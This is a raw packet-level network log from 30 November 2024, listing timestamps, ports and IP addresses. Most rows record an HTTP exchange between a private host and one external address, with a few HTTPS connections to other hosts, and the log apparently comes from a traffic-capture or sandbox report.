Nov 30, 2024 04:06:46.570008993 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.570070028 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.570102930 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.570146084 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.570971012 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.571018934 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.571079969 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.571122885 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.571943045 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.571989059 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.572053909 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.572179079 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.572882891 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.572973967 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.572999001 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.573045015 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.573862076 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.573904991 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.573957920 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.574002981 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.574860096 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.574901104 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.574935913 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.574981928 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.575767040 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.575834036 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.575879097 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.576061964 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.576733112 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.576777935 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.576853037 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.576896906 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.577693939 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.577738047 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.577802896 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.577929020 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.578640938 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.578687906 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.578739882 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.578783035 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.579595089 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.579648972 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.579689026 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.579734087 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.580570936 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.580631018 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.580634117 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.580674887 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.581521988 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.581635952 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.581646919 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.581671000 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.582479954 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.582530975 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.582587004 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.582633018 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.583427906 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.583473921 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.712013960 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.712172985 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.712302923 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.712403059 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.713294029 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.713423967 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.714236021 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.714325905 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.715174913 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.715339899 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.716171026 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.716341972 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.717098951 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.717206955 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.717427015 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.717987061 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.719515085 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.740969896 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.741019964 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.741218090 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.741326094 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.742217064 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.742288113 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.743134022 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.743256092 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.744129896 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.744216919 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.745050907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.745163918 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.746022940 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.746117115 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.746973038 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.747081995 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.747926950 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.748038054 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.748100996 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.748366117 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.748924017 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.749006987 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.749061108 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.749867916 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.749999046 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.750071049 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.750816107 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.750919104 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.751768112 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.751899958 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.752684116 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.752723932 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.752835989 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.752841949 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.752872944 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.753680944 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.753731966 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.754218102 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.754647970 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.754750967 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.755527020 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.755603075 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.755666018 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.755944014 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.756568909 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.756645918 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.756762028 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.756824970 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.757529974 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.757576942 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.757642984 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.757688999 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.758481026 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.758549929 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.758589983 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.758635044 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.759433985 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.759540081 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.759588003 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.760404110 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.760454893 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.760515928 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.760560989 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.761356115 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.761431932 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.761476040 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.761526108 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.762350082 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.762398005 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.762536049 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.762607098 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.763281107 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.763410091 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.763425112 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.763474941 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.764244080 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.764339924 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.764364958 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.764415979 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.765197992 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.765264034 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.765302896 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.765433073 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.766165972 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.766278982 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.766308069 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.766362906 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.767132044 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.767179012 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.767249107 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.767291069 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.768089056 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.768134117 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.768208981 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.768253088 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.769022942 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.769071102 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.769153118 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.769264936 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.769996881 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.770042896 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.770117998 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.770163059 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.770984888 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.771028042 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.771083117 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.771123886 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.771944046 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.771991968 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.772104979 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.772172928 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.772881031 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.772928953 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.772991896 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.773036003 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.773847103 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.773890018 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.773967981 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.774008989 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.774794102 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.774898052 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.774910927 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.774986029 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.775753975 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.775799036 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.775856018 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.775901079 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.776722908 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.776767969 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.776832104 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.776879072 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.777693987 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.777803898 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.777832031 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.778012037 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.778669119 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.778717995 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.778778076 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.778820038 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.779618025 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.779663086 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.779710054 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.779755116 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.780572891 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.780635118 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.780751944 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.780901909 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.781528950 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.781588078 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.781637907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.781893015 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.782484055 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.782552958 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.782639980 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.782689095 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.783452988 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.783498049 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.783536911 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.783576965 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.784411907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.784480095 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.784507990 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.784550905 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.785960913 CET	49866	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:46.785984993 CET	443	49866	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:46.786165953 CET	49866	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:46.790101051 CET	49866	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:46.790119886 CET	443	49866	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:46.796375036 CET	49867	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:46.796416998 CET	443	49867	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:46.796960115 CET	49867	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:46.798444033 CET	49867	443	192.168.2.4	34.117.188.166
Nov 30, 2024 04:06:46.798455954 CET	443	49867	34.117.188.166	192.168.2.4
Nov 30, 2024 04:06:46.828388929 CET	49868	443	192.168.2.4	35.244.181.201
Nov 30, 2024 04:06:46.828473091 CET	443	49868	35.244.181.201	192.168.2.4
Nov 30, 2024 04:06:46.828680992 CET	49868	443	192.168.2.4	35.244.181.201
Nov 30, 2024 04:06:46.828807116 CET	49868	443	192.168.2.4	35.244.181.201
Nov 30, 2024 04:06:46.828845978 CET	443	49868	35.244.181.201	192.168.2.4
Nov 30, 2024 04:06:46.894027948 CET	49869	443	192.168.2.4	34.160.144.191
Nov 30, 2024 04:06:46.894063950 CET	443	49869	34.160.144.191	192.168.2.4
Nov 30, 2024 04:06:46.894123077 CET	49869	443	192.168.2.4	34.160.144.191
Nov 30, 2024 04:06:46.894241095 CET	49869	443	192.168.2.4	34.160.144.191
Nov 30, 2024 04:06:46.894254923 CET	443	49869	34.160.144.191	192.168.2.4
Nov 30, 2024 04:06:46.913410902 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.913527012 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.913856983 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.913978100 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.914927006 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.915098906 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.915791988 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.915909052 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.916831017 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.916937113 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.917726040 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.917833090 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.918003082 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.918664932 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.918735981 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.921972036 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.942343950 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.942397118 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.942445993 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.942491055 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.942809105 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.942909956 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.942923069 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.942965031 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.943772078 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.943819046 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.943892956 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.944000006 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.944725037 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.944771051 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.944844961 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.944889069 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.945694923 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.945739031 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.945808887 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.945887089 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.946655035 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.946716070 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.946742058 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.946789980 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.947654963 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.947704077 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.947705984 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.947839975 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.948566914 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.948612928 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.948663950 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.948709011 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.949520111 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.949564934 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.949628115 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.949692965 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.950478077 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.950525045 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.950556040 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.950598955 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.951462030 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.951503992 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.951555967 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.951596975 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.952406883 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.952451944 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.952501059 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.952548027 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.953392982 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.953444004 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.953495026 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.953538895 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.954329014 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.954391003 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.954432964 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.954526901 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.955295086 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.955337048 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.955408096 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.955451965 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.956250906 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.956299067 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.956350088 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.956394911 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:46.957209110 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:46.957251072 CET	49840	80	192.168.2.4	185.215.113.16
